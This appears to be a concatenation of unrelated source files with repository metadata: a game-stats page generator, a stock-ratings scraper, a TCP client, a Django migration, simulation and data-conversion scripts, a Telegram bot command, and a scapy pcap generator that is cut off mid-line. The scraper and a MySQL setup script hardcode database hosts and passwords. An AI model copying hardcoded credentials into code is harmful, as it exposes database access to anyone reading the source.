if results[idx]['Kind'] != kind: # No firsts for this Kind, so go to the next without starting a table for it
continue
line('h4', "{0}s".format(kind), klass = "tablename")
with tag('table', klass = 'sortable'):
with tag('thead'):
with tag('tr'):
for header in ['Player', 'Guild', 'What', 'Date (UTC)']:
line('th', header)
with tag('tbody'):
# Loop through and print rows until end or next table needed
while idx < reslen and results[idx]['Kind'] == kind:
with tag('tr'):
for cell in ['Player', 'Guild', 'What', 'Stamp']:
if cell == 'What':
with tag('td'):
magurl = kind.lower()
if magurl == "artifactcollection":
magurl = "artifactset"
line('a', results[idx][cell], href = "https://rift.magelo.com/en/{0}/{1}".format(magurl,results[idx]['Id']))
else:
if cell == 'Player':
results[idx][cell] += "@" + results[idx]['Shard']
# The timestamp comes out as a datetime.datetime. Manually make everything a string.
line('td', results[idx][cell].__str__())
idx += 1
with tag('p'):
text('See other RIFT tools ')
line('a', "here", href="https://rift.events/main.html")
text('.')
doc.asis('<!--/email_off-->')
start_response('200 OK', [('Content-Type','text/html')])
return [doc.getvalue().encode('utf8')]
|
[
"saturos@gmail.com"
] |
saturos@gmail.com
|
8fc93cb60924b550a0d0ea9d4aec76d96c598d47
|
b8b93ba3a9cbf7231573b636cbd50de157fe23cb
|
/test/main/PandasTest.py
|
cd4ac2a3d9f06e1c835edb14402712985144c991
|
[] |
no_license
|
JeffreyLinWeiYou/TestGit
|
18c2af1d6d8c6dcf0900ba8196a7bfd70a98c48f
|
9538624ac24b0a88dbd9498bb414d38a83361692
|
refs/heads/master
| 2020-06-15T17:25:10.663993
| 2016-12-01T09:15:39
| 2016-12-01T09:15:39
| 75,275,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,392
|
py
|
#-*- coding:utf-8 -*-
# fetch data from cnyes.com (鉅亨網)
import pandas as pd
import MySQLdb
import time
import datetime
'''
Created on 2015-10-23
@author: ben
'''
if __name__ == '__main__':
stop=False
nowDate=datetime.date.today()
endDate=datetime.date(2012,01,01)
temp=nowDate-endDate
db=MySQLdb.connect("140.118.7.46","s8107072004","ben60514","test",charset='utf8')
cursor =db.cursor()
while temp.days>0:
firstDate=nowDate
secondDate=nowDate-datetime.timedelta(days=30)
# print "firstDate=",firstDate
# print "secondDate=",secondDate
i=1
while True:
try:
url = "http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=%d&ratetype=QFII&ratedate1=%s&ratedate2=%s&sortorder=date"%\
(i,secondDate.strftime('%Y%m%d'),nowDate.strftime('%Y%m%d'))
print url
data = pd.read_html(url)
frameData=data[len(data)-3][2:]
#print frameData
# print frameData
i+=1
except:
break
for index,row in frameData.iterrows():
# sql="INSERT INTO foreign_original(date,code,company,traderCompany,originalRate,riseOrDrop,newRate,\
# EPS,oldTargetPrice,newTargetPrice,nowPrice,remark)\
# VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" %\
# (row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11])
# try:
# cursor.execute(sql)
# db.commit()
# except MySQLdb.Error as e:
# print "Error %d: %s" % (e.args[0], e.args[1])
print type(row[10])
print row[10]
break
nowDate=nowDate-datetime.timedelta(days=31)
temp=nowDate-endDate
db.close()
# print type(temp.days)
# print temp.days
#
# print nowDate.strftime('%Y%m%d')
# print type(nowDate)
url = 'http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=2&ratetype=QFII&ratedate1=20150708&ratedate2=20151023&sortorder=date'
#http://www.cnyes.com/twstock/twstock_qfii_sc.asp?x=33&y=13&id=&tel=&selpage=2&ratetype=QFII&ratedate1=20150708&ratedate2=20151023&sortorder=date
# data = pd.read_html(url)
# print len(data)
# frameData=data[len(data)-3]
# print (frameData.iloc[[2]])[0]
# print type(frameData.iloc[[2]])
# db=MySQLdb.connect("140.118.7.46","s8107072004","ben60514","crawler_test",charset='utf8')
# cursor =db.cursor()
# sql="INSERT INTO foreign_original(date,code,company,traderCompany,originalRate,riseOrDrop,newRate,\
# EPS,oldTargetPrice,newTargetPrice,nowPrice,remark)\
# VALUES ('%d','%d','%s','%s','%s','%s','%s','%s','%f','%f','%f','%s')" %\
# (20150713,2382,'廣達','麥格理','--','首次','超越市場表現','--',0,86,57.10,'--')
# try:
# cursor.execute(sql)
# db.commit()
# except MySQLdb.Error as e:
# print "Error %d: %s" % (e.args[0], e.args[1])
# db.close()
#print type(data[len(data)-3])
#print data[len(data)-3]
#data[0]
pass
|
[
"m10407519@mail.ntust.edu.tw"
] |
m10407519@mail.ntust.edu.tw
|
021b6bc6e0b4c42b02abd800e83abb5c79ecf202
|
f15815e06a9d91957a637dde81a11f588e9a0b76
|
/python retrospect/TCP-Client.py
|
8bd9bf38c5936b621c3b207b329f1f92bfd8c0f4
|
[] |
no_license
|
CoffeeCati/Spider
|
30db20ce8c785713553538505598b2b49ea1a81d
|
996be09c1aa28c7f87bb88fdb66b9198ad232ae4
|
refs/heads/master
| 2023-03-30T01:20:31.008342
| 2021-03-16T08:10:52
| 2021-03-16T08:10:52
| 347,562,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
# coding:utf-8
import socket
# initialize the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the target IP and port
s.connect(('127.0.0.1', 9999))
# receive a message
print('--->>' + s.recv(1024).decode('utf-8'))
# send a message
s.send(b'Hello I am a client!')
print('--->>' + s.recv(1024).decode('utf-8'))
s.send(b'exit')
# close the socket
s.close()
|
[
"liushuo@liushuodeMacBook-Air.local"
] |
liushuo@liushuodeMacBook-Air.local
|
91c16b7f88506a969d154a333aa1c6e31b157ca6
|
042b95bf8ff71bf707806d8ccb63a5275bafd97e
|
/todo/tasks/migrations/0001_initial.py
|
3174f72ea089c8338839448d6ef7de54fb019d11
|
[] |
no_license
|
jcramirez9920/Project-3-todo
|
d19a7d88fa5791ddff16cdec75ec0ccbd9753e0e
|
833e6a29083118a37f7552558a7e97199664bb52
|
refs/heads/main
| 2023-02-08T13:49:49.712482
| 2021-01-03T03:30:08
| 2021-01-03T03:30:08
| 326,319,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
# Generated by Django 3.1.4 on 2021-01-03 02:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('complete', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"noreply@github.com"
] |
jcramirez9920.noreply@github.com
|
d1f1d88d29f302999839d0333712af4358988c6b
|
8d472f89dd6a62d3b0c8853fa8fbeab0061e639f
|
/elevator_simulation_submit/main.py
|
3c7302fe3282305c1ba2a8fb222e533efd2f9912
|
[] |
no_license
|
chrisskhoury/ElevatorSimulation
|
abcc06cfb381f78507ad7cbc0eacbc42b340de04
|
3006ee94cd3798117d303a330b150be2962fc8a1
|
refs/heads/master
| 2023-01-23T03:31:38.093510
| 2020-11-20T12:13:10
| 2020-11-20T12:13:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
from visual import *
def main():
is_visual = True
sim1 = Simulation(mode = 0, visual=is_visual)
sim2 = Simulation(mode = 1, visual=is_visual)
visual = Visual((sim1, sim2))
vis = Thread(target=visual.draw)
if is_visual:
vis.start()
t1 = Thread(target=sim1.start_elevator)
t2 = Thread(target=sim2.start_elevator)
t1.start()
sleep(0.5)
t2.start()
t1.join()
t2.join()
vis.join()
if __name__ == "__main__":
main()
|
[
"khourychris13@gmail.com"
] |
khourychris13@gmail.com
|
e36c638dad1da5fce1f73b4a66df9bfb794d17c1
|
868a1a37d11f48dbe22c01849fffd0d8bca27937
|
/code/distance_matrix_csv_to_time_curves_format.py
|
34e9d1acb67c78a1ce3bb7471853c1da595b896a
|
[] |
no_license
|
NattyBumppo/aero-astro-thesis
|
092b5b380d3bd3de889d9478e2d18e297c2fc629
|
a5b15906c660d420d058b06f09603177abe958a0
|
refs/heads/master
| 2021-01-10T15:52:01.655140
| 2016-03-15T04:14:16
| 2016-03-15T04:14:16
| 51,424,010
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,025
|
py
|
import csv
import json
import datetime
import sys
import numpy as np
pcc_distance_matrix = 'pcc_distance_matrix.csv'
tau_distance_matrix = 'tau_distance_matrix.csv'
rho_distance_matrix = 'rho_distance_matrix.csv'
pcc_timecurve_json_filename = 'pcc_timecurve_from_distance_matrix.json'
tau_timecurve_json_filename = 'tau_timecurve_from_distance_matrix.json'
rho_timecurve_json_filename = 'rho_timecurve_from_distance_matrix.json'
pcc_name = 'PFM2 User Test Data (PCC Correlations)'
tau_name = 'PFM2 User Test Data (Kendall\'s Tau Correlations)'
rho_name = 'PFM2 User Test Data (Spearman\'s Rho Correlations)'
pcc_distance_matrix_simpler = 'pcc_distance_matrix_simpler.csv'
tau_distance_matrix_simpler = 'tau_distance_matrix_simpler.csv'
rho_distance_matrix_simpler = 'rho_distance_matrix_simpler.csv'
pcc_timecurve_json_filename_simpler = 'pcc_timecurve_from_distance_matrix_simpler.json'
tau_timecurve_json_filename_simpler = 'tau_timecurve_from_distance_matrix_simpler.json'
rho_timecurve_json_filename_simpler = 'rho_timecurve_from_distance_matrix_simpler.json'
pcc_name_simpler = 'PFM2 User Test Data (PCC Correlations, Simplified)'
tau_name_simpler = 'PFM2 User Test Data (Kendall\'s Tau Correlations, Simplified)'
rho_name_simpler = 'PFM2 User Test Data (Spearman\'s Rho Correlations, Simplified)'
pcc_distance_matrix_averaged = 'pcc_distance_matrix_averaged.csv'
tau_distance_matrix_averaged = 'tau_distance_matrix_averaged.csv'
rho_distance_matrix_averaged = 'rho_distance_matrix_averaged.csv'
pcc_timecurve_json_filename_averaged = 'pcc_timecurve_from_distance_matrix_averaged.json'
tau_timecurve_json_filename_averaged = 'tau_timecurve_from_distance_matrix_averaged.json'
rho_timecurve_json_filename_averaged = 'rho_timecurve_from_distance_matrix_averaged.json'
pcc_name_averaged = 'PFM2 User Test Data (PCC Correlations, Averaged in 5-Second Chunks)'
tau_name_averaged = 'PFM2 User Test Data (Kendall\'s Tau Correlations, Averaged in 5-Second Chunks)'
rho_name_averaged = 'PFM2 User Test Data (Spearman\'s Rho Correlations, Averaged in 5-Second Chunks)'
# Let's dump these out into a .json file for timecurve conversion
for input_distance_matrix_filename, output_json_filename, dataset_name in ((pcc_distance_matrix, pcc_timecurve_json_filename, pcc_name),
(tau_distance_matrix, tau_timecurve_json_filename, tau_name),
(rho_distance_matrix, rho_timecurve_json_filename, rho_name),
(pcc_distance_matrix_simpler, pcc_timecurve_json_filename_simpler, pcc_name_simpler),
(tau_distance_matrix_simpler, tau_timecurve_json_filename_simpler, tau_name_simpler),
(rho_distance_matrix_simpler, rho_timecurve_json_filename_simpler, rho_name_simpler),
(pcc_distance_matrix_averaged, pcc_timecurve_json_filename_averaged, pcc_name_averaged),
(tau_distance_matrix_averaged, tau_timecurve_json_filename_averaged, tau_name_averaged),
(rho_distance_matrix_averaged, rho_timecurve_json_filename_averaged, rho_name_averaged)):
# Load distance matrix from .csv file
reader = csv.reader(open(input_distance_matrix_filename,"rb"),delimiter=',')
distance_matrix = list(reader)
print 'Loaded %s by %s matrix from %s' % (len(distance_matrix), len(distance_matrix[0]), input_distance_matrix_filename)
# Convert to numpy matrix of floats
distance_matrix = np.array(distance_matrix).astype('float')
num_timesteps = distance_matrix.shape[0]
json_dict = {}
json_dict['distancematrix'] = distance_matrix.tolist()
earliest_time = '02/28/2016 20:20:20'
earliest_time_struct = datetime.datetime.strptime(earliest_time, "%m/%d/%Y %H:%M:%S")
times = [str(earliest_time_struct + datetime.timedelta(seconds=t)) for t in range(num_timesteps)]
json_dict['data'] = [{'name': dataset_name, 'timelabels': times}]
# Finally, write the .json file
with open(output_json_filename, 'w') as outfile:
json.dump(json_dict, outfile)
print "Outputted time curve data to .json file (%s)" % output_json_filename
|
[
"natguy@cs.washington.edu"
] |
natguy@cs.washington.edu
|
654826afa60eff170f1cc0644218bfd1fd403918
|
67125475ea684e661948e3918cbceafb9b03c9af
|
/DewmiBot/modules/contributors.py
|
ede0033b8c652d151a400102b872746719eb9472
|
[] |
no_license
|
ImTheekshana126/Dewmi-Group-Manage-Bot
|
60a359e3e380756ec3cd9f739666ee045413183b
|
54a691ee22f4be463aa295b992539217cefddba1
|
refs/heads/main
| 2023-08-15T04:39:38.575090
| 2021-09-28T09:45:27
| 2021-09-28T09:45:27
| 410,700,598
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
import github # pyGithub
from pyrogram import filters
from DewmiBot.services.pyrogram import pbot as client
@client.on_message(filters.command("contributors") & ~filters.edited)
async def give_cobtribs(c, m):
g = github.Github()
co = ""
n = 0
repo = g.get_repo("youtubeslgeekshow/sz-rose-bot")
for i in repo.get_contributors():
n += 1
co += f"{n}. [{i.login}](https://github.com/{i.login})\n"
t = f"**Szrosebot Contributors**\n\n{co}\n\n\nA Powerful BOT to Make Your Groups Secured and Organized ! ✨"
await m.reply(t, disable_web_page_preview=True)
__help__ = """
@szrosebot🇱🇰
Contributor
❍ /contributors : contributors using this bot
"""
__mod_name__ = "contributors"
|
[
"noreply@github.com"
] |
ImTheekshana126.noreply@github.com
|
d3dd62fc04a8f4b024b7061a3a1f5860ef683e74
|
d4f134b9c3e537e22cc1546c4d9f4a6383293644
|
/create_database/setup.py
|
6034e2a7c402fc6e1316f38b3f4fdead23a62286
|
[] |
no_license
|
ffallrain/SPA_server
|
158d318e4f8aef56615a81b42a01753aa92aef3a
|
0e0017a8f44f70426afb56b929f6e10a781fa6be
|
refs/heads/master
| 2021-01-16T18:55:05.868856
| 2019-07-11T11:37:21
| 2019-07-11T11:37:21
| 100,125,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
#!/usr/bin/python
import mysql.connector as mc
db = mc.connect( host = 'localhost',
user = 'fuqy',
passwd = '123',
database = 'SPA_database',
)
mycursor = db.cursor()
mycursor.execute("""CREATE TABLE system_information
( index_number INT NOT NULL AUTO_INCREMENT ,
pdb_id CHAR(4),
chain CHAR(1),
binding_site_definition VARCHAR(3),
resolution FLOAT,
number_of_hydration_sites SMALLINT,
alternative_pose CHAR(1),
register_date TIMESTAMP ,
PRIMARY KEY ( index_number )
)
""")
mycursor.execute("""CREATE TABLE water_cluster
( primary_key_number INT NOT NULL AUTO_INCREMENT ,
index_number INT,
water_index SMALLINT,
water_type CHAR(3),
occ FLOAT,
vdw_sol FLOAT,
vdw_rec FLOAT,
ele_sol FLOAT,
ele_rec FLOAT,
t_s FLOAT,
o_s FLOAT,
spa_g FLOAT,
rt FLOAT,
o_x FLOAT,
o_y FLOAT,
o_z FLOAT,
h1_x FLOAT,
h1_y FLOAT,
h1_z FLOAT,
h2_x FLOAT,
h2_y FLOAT,
h2_z FLOAT,
PRIMARY KEY ( primary_key_number ),
FOREIGN KEY ( index_number ) REFERENCES system_information(index_number)
);
""")
|
[
"ffallrain@163.com"
] |
ffallrain@163.com
|
ad0ff9dd8f94e44da2c676929e72f84e4397e58a
|
d2e542fd6ae78218ef6400cdd1cfd591fc51c23a
|
/code/baselines.py
|
8edd011cb6bf5fd5fdef1e989424282e852fda64
|
[] |
no_license
|
penggewudi/SCD_System_3.0
|
ecfade086501ca12db2005272c60c8dd28c20d19
|
bb704eebb4d638cbbd988fb1ee33cba7766233d5
|
refs/heads/master
| 2022-06-16T11:53:51.736956
| 2020-05-04T12:37:43
| 2020-05-04T12:37:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,767
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2019/12/9 15:19
# @Author : Chen Yu
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
import lightgbm as lgb
from code.utils.input_data import load_data, preprocess_data
from code.utils.utils import evaluation
import warnings
warnings.filterwarnings("ignore")
def my_svr(X_train, Y_train, X_test):
reg = SVR()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
def my_rdf(X_train, Y_train, X_test):
reg = RandomForestRegressor()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
def my_gbm(X_train, Y_train, X_test):
reg = lgb.LGBMRegressor()
reg.fit(X_train, Y_train)
Y_pred = reg.predict(X_test)
return Y_pred
if __name__ == '__main__':
# ==== Hyper Parameters
SEQ_LEN = 9
PRE_LEN = 1
TRAIN_RATE = .8
# ==== read data
data, adj = load_data('sh')
time_len = data.shape[0]
num_nodes = data.shape[1]
# ==== predict every station
all_rmse, all_mae, all_mape, all_acc, all_r2_score, all_var_score = [], [], [], [], [], []
for node in range(num_nodes):
if node % 10 == 0:
            print('processed:%s' % node, 'all:%s' % num_nodes)
station_data = data[:, node]
# ==== normalization
mms = MinMaxScaler()
station_data = mms.fit_transform(station_data)
X_train, Y_train, X_test, Y_test = preprocess_data(station_data, TRAIN_RATE, SEQ_LEN, PRE_LEN)
X_train = X_train.reshape(-1, SEQ_LEN)
X_test = X_test.reshape(-1, SEQ_LEN)
Y_train = Y_train.reshape(-1)
# ==== choose method
# Y_pred = my_svr(X_train, Y_train, X_test)
# Y_pred = my_rdf(X_train, Y_train, X_test)
Y_pred = my_gbm(X_train, Y_train, X_test)
Y_pred = Y_pred.reshape(-1, 1)
Y_test = Y_test.reshape(-1, 1)
Y_test = mms.inverse_transform(Y_test)
Y_pred = mms.inverse_transform(Y_pred)
rmse, mae, mape, acc, r2_score, var_score = evaluation(Y_test, Y_pred)
all_rmse.append(rmse)
all_mae.append(mae)
all_mape.append(mape)
all_acc.append(acc)
all_r2_score.append(r2_score)
all_var_score.append(var_score)
print('All score:',
'min_rmse:{:.4}'.format(np.mean(all_rmse)),
'min_mae:{:.4}'.format(np.mean(all_mae)),
'max_acc:{:.4}'.format(np.nanmean(all_acc)),
'min_mape:{:.4}'.format(np.mean(all_mape)),
'r2:{:.4}'.format(np.nanmean(all_r2_score)),
'var:{:.4}'.format(np.nanmean(all_var_score)))
|
[
"yuchen.723@bytedance.com"
] |
yuchen.723@bytedance.com
|
7ec766d97ef91051922f663f47a391d840e63cea
|
353964dbdea07cee2f948f5a08c14205fdc110e9
|
/scapy_pcap.py
|
14267ae9fe056162a5bd6db7bd4db7c8efcff1a4
|
[
"MIT"
] |
permissive
|
vnetman/scapy-pcap
|
571c8411280f186fac13936b021def01d3504992
|
b967242bb1c8727cf58cb1b4515849f0486ee382
|
refs/heads/master
| 2020-03-07T08:46:51.091754
| 2018-04-03T04:45:33
| 2018-04-03T04:45:33
| 127,388,437
| 5
| 2
| null | 2018-03-30T06:31:06
| 2018-03-30T06:05:40
| null |
UTF-8
|
Python
| false
| false
| 14,695
|
py
|
#!/usr/bin/env python3
# MIT License
# Copyright (c) 2018 vnetman@zoho.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#----------------------------------------------------------------------
# The purpose of this script is to generate a single .pcap file.
#
# ./scapy_pcap.py --out <file.pcap>
#
# The .pcap file contains packets for one or more complete TCP
# sessions (starting from the SYN handshake to the FIN/ACK
# sequence).
#
# The parameters of the TCP sessions (i.e. addresses, packet lengths,
# bitrates etc.) are coded in the script itself, because it is too
# cumbersome to specify these on the command line.
#
# It is possible to start a TCP session whilst others are in progress
# (i.e. it is not necessary to start a session only after the previous
# one has finished).
#
# Packet lengths as well as bitrates can also be specified on a
# per-session basis.
#------------------------------------------------------------------------
# Suppress scapy IPv6 default route message
import logging
prev_level = logging.getLogger("scapy.runtime").getEffectiveLevel()
# save prev log level
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# import modules
from scapy.all import *
from scapy.utils import PcapWriter
# restore prev log level
logging.getLogger("scapy.runtime").setLevel(prev_level)
import time
from random import randint
import argparse
import os
import sys
# The 'stream_specs' tuple defined below is used to generate a set of
# streams like this (X axis is time in seconds, e.g. Stream C starts
# at offset 140 seconds and lasts 150 seconds (i.e. upto the 290
# second mark)):
#
#
# 0 300
# Stream A: |---------------------------------| 30kbps
# Packet len = 1400 bytes
#
# 10 120
# Stream B: |-----------| 1Mbps
# Packet len = 580 bytes
#
# 140 290
# Stream C: |--------------| 200kbps
# Packet len = 700 bytes
#
# 110 145
# Stream D: |-----| 4Mbps
# Packet len = 100 bytes
#
# 142 146
# Stream E: |--| 20Mbps
# Packet len = 70 bytes
# The sessions are specified here. Modify to suit.
#
stream_specs = (
{'name' : 'Stream A',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.11',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:11',
'server_port' : 80,
'client_port' : 1050,
'rate_bps' : 30 * 1000,
'packet_length' : 1400,
'duration' : 300,
'start_at' : 0},
{'name' : 'Stream B',
'server_ip' : '1.1.1.15',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:15',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 80,
'client_port' : 1051,
'rate_bps' : 1 * 1000 * 1000,
'packet_length' : 580,
'duration' : 120 - 10,
'start_at' : 10},
{'name' : 'Stream C',
'server_ip' : '1.1.1.15',
'client_ip' : '1.1.1.11',
'server_mac' : '00:00:0c:01:01:15',
'client_mac' : '00:00:0c:01:01:11',
'server_port' : 80,
'client_port' : 1052,
'rate_bps' : 200 * 1000,
'packet_length' : 700,
'duration' : 290 - 140,
'start_at' : 140},
{'name' : 'Stream D',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 8080,
'client_port' : 1053,
'rate_bps' : 4 * 1000 * 1000,
'packet_length' : 100,
'duration' : 145 - 110,
'start_at' : 110},
{'name' : 'Stream E',
'server_ip' : '1.1.1.14',
'client_ip' : '1.1.1.13',
'server_mac' : '00:00:0c:01:01:14',
'client_mac' : '00:00:0c:01:01:13',
'server_port' : 443,
'client_port' : 1054,
'rate_bps' : 20 * 1000 * 1000,
'packet_length' : 70,
'duration' : 146 - 142,
'start_at' : 142},)
#----------------------------------------------------------------------
def bps_to_pps(bits_per_sec, packet_len):
"""Given a bits-per-second value, return the packets per second for the
given packet length. Also return the time interval (in seconds) between
successive packets"""
packets_per_sec = (bits_per_sec / (8 * packet_len))
inter_packet_gap_sec = 1.0 / packets_per_sec
return (packets_per_sec, inter_packet_gap_sec)
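# Worked example (illustrative): for Stream B above, bps_to_pps(1 * 1000 * 1000, 580)
# gives roughly 215.5 packets per second and a gap of about 0.00464 s between packets,
# so its 110-second duration yields on the order of 23,700 data packets.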
#----------------------------------------------------------------------
def make_tcp_stream(client_ip, server_ip, client_mac, server_mac,
client_port, server_port, bps, duration,
ts_first_packet, packet_len):
"""Return an array of 2-tuples, each 2-tuple representing a packet. The
first member of each tuple is the timestamp (at which it is inserted in the
pcap), and the second member is a dictionary that contains packet
information (src & dest ip addresses, tcp ack & seq numbers, etc.)"""
stream = []
ts = ts_first_packet
# Random TCP sequence numbers
c_isn = randint(1000, 1000000)
s_isn = randint(1000, 1000000)
# SYN; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'S',
'TcpSeqNo' : c_isn }
stream.append((ts, p,))
ts = ts + 0.2
# SYN+ACK; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'SA',
'TcpSeqNo' : s_isn,
'TcpAckNo' : c_isn + 1 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 1 }
stream.append((ts, p,))
ts = ts + 0.2
# packet_len is inclusive of ether, ipv4 and tcp headers; check if it
# is sane
header_size = 14 + 20 + 20 # ether + ipv4 + tcp
if packet_len < header_size:
raise ValueError('Specified packet length {} is smaller than '
'the minimum allowed ({})'.
format(packet_len, header_size))
tcp_payload_len = packet_len - header_size
(pps, gap) = bps_to_pps(bps, packet_len)
num_packets = int(pps * duration) + 1
server_data_offset = 0
payload = RandString(size = tcp_payload_len)
# From this point on, server sends packets with TCP payloads, and
# the client just acks them => client seq number does not increment
for i in range(0, num_packets):
# Data; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'A',
'TcpSeqNo' : s_isn + 1 + server_data_offset,
'TcpAckNo' : c_isn + 1,
'TcpData' : payload }
stream.append((ts, p,))
# We stick the (c->s) ack halfway between two successive data packets
ts = ts + (gap/2)
server_data_offset = server_data_offset + tcp_payload_len
# Ack; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 1 + server_data_offset }
stream.append((ts, p,))
ts = ts + (gap/2)
# FIN; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'F',
'TcpSeqNo' : s_isn + 1 + server_data_offset,
'TcpAckNo' : 0 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'A',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : s_isn + 2 + server_data_offset }
stream.append((ts, p,))
ts = ts + 0.2
# FIN; (c->s)
p = { 'EtherDst' : server_mac,
'EtherSrc' : client_mac,
'IpSrc' : client_ip,
'IpDst' : server_ip,
'TcpSrc' : client_port,
'TcpDst' : server_port,
'TcpFlags' : 'F',
'TcpSeqNo' : c_isn + 1,
'TcpAckNo' : 0 }
stream.append((ts, p,))
ts = ts + 0.2
# ACK; (s->c)
p = { 'EtherDst' : client_mac,
'EtherSrc' : server_mac,
'IpSrc' : server_ip,
'IpDst' : client_ip,
'TcpSrc' : server_port,
'TcpDst' : client_port,
'TcpFlags' : 'A',
'TcpSeqNo' : s_isn + 2 + server_data_offset,
'TcpAckNo' : c_isn + 2 }
stream.append((ts, p,))
return stream
#----------------------------------------------------------------------
def main():
desc = """Generate pcap file for one or more TCP/IPv4 streams.
Stream characteristics (IP addresses, bitrates, packet lengths etc.)
are coded in the script file itself."""
parser = argparse.ArgumentParser(description = desc)
parser.add_argument('--out', required = True,
metavar = '<output pcap file name>')
args = parser.parse_args()
if (os.path.isfile(args.out)):
print('"{}" already exists, refusing to overwrite.'.format(args.out))
sys.exit(-1)
streams = []
for ss in stream_specs:
s = make_tcp_stream(server_ip = ss['server_ip'],
client_ip = ss['client_ip'],
server_mac = ss['server_mac'],
client_mac = ss['client_mac'],
client_port = ss['client_port'],
server_port = ss['server_port'],
bps = ss['rate_bps'],
duration = ss['duration'],
ts_first_packet = ss['start_at'],
packet_len = ss['packet_length'])
print('"{}" contains {} packets'.format(ss['name'], len(s)))
streams.append(s)
print('{} streams in this pcap'.format(len(streams)))
# The 'all' dictionary contains information about every packet
# that will go into the pcap.
#
# Key => timestamp (rendered as a string)
# Value => list of (packet, timestamp) tuples at that timestamp
# (since we allow more than one stream, there can be more than one
# packet at the exact same timestamp)
all = dict()
total_packets = 0
for s in streams:
for (ts, p) in s:
key = '%014.6f' % ts
if not key in all:
all[key] = []
all[key].append((p, ts,))
total_packets = total_packets + 1
pcap = PcapWriter(args.out, append = True, sync = False)
rendered = 0
# Sorting the keys of the 'all' dictionary gives us the packets in
# the correct chronological order.
for key in sorted(all):
for (pkt, ts) in all[key]:
# Make a scapy packet with the available packet
# information.
scapy_pkt = Ether(dst = pkt['EtherDst'], src = pkt['EtherSrc'])/ \
                        IP(dst = pkt['IpDst'], src = pkt['IpSrc'])/ \
